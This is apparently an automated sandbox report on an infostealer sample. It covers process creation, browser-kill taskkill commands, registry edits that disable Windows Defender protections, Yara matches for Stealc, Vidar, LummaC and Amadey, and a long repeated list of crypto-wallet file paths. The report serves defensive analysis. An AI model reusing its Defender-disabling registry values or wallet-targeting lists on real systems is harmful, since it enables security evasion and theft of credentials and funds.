Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe "C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe"	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C684760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C684760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C561C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C561C30

Source: 2922d7c574.exe, 00000011.00000002.2812872415.0000000000A12000.00000002.00000001.01000000.00000011.sdmp, 2922d7c574.exe, 00000025.00000000.2882255314.0000000000A12000.00000002.00000001.01000000.00000011.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, file.exe, 00000000.00000002.2130744682.0000000000FD7000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: dProgram Manager
Source: skotes.exe, skotes.exe, 0000000B.00000002.3082237036.0000000000BDB000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: Program Manager
Source: firefox.exe, 00000031.00000002.3155000278.0000024F64890000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: firefox.exe, 00000031.00000002.3155000278.0000024F64890000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: firefox.exe, 00000031.00000002.3092985841.000000AA349FB000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?Progman
Source: firefox.exe, 00000031.00000002.3155000278.0000024F64890000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: firefox.exe, 00000031.00000002.3155000278.0000024F64890000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: }Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C63AE71 cpuid

0_2_6C63AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C63A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C63A8DC

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 11_2_009F65E0 LookupAccountNameA,

11_2_009F65E0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C588390 NSS_GetVersion,

0_2_6C588390

Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe

Registry value created: TamperProtection 0

Source: 0718eb7837.exe, 0718eb7837.exe, 0000000E.00000003.2783198583.000000000151C000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000002.3094604903.000000000165E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 10.2.skotes.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.DocumentsKECFIDGCBF.exe.820000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.skotes.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2158334223.0000000000821000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000003.2325476805.00000000051B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000003.2153154830.0000000005060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.2118042916.0000000005010000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2193621172.00000000009F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.3080728163.00000000009F1000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: 2922d7c574.exe PID: 4600, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: dump.pcap, type: PCAP

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: 0718eb7837.exe PID: 6588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0718eb7837.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2129788119.000000000074E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2912762087.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2737911561.0000000000E11000.00000040.00000001.01000000.00000010.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1709468423.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2743981437.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000003.2825521059.00000000057C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000020.00000002.2919990948.0000000001AAB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000003.2687883624.0000000005150000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2130376795.0000000000C11000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aedbd2e320.exe PID: 5956, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aedbd2e320.exe PID: 6520, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7540, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \ElectronCash\wallets\
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Jaxx Desktop (old)
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \Exodus\exodus.wallet\
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: info.seco
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: passphrase.json
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: \jaxx\Local Storage\
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Chia Wallet\config\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\run\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\wallet\|2\|\.chia\mainnet\wallet\\|.\|0\|Komodo Wallet\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: Exodus\exodus.wallet
Source: file.exe, 00000000.00000002.2130376795.0000000000D77000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: file__0.localstorage
Source: file.exe, 00000000.00000002.2130376795.0000000000CDC000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local 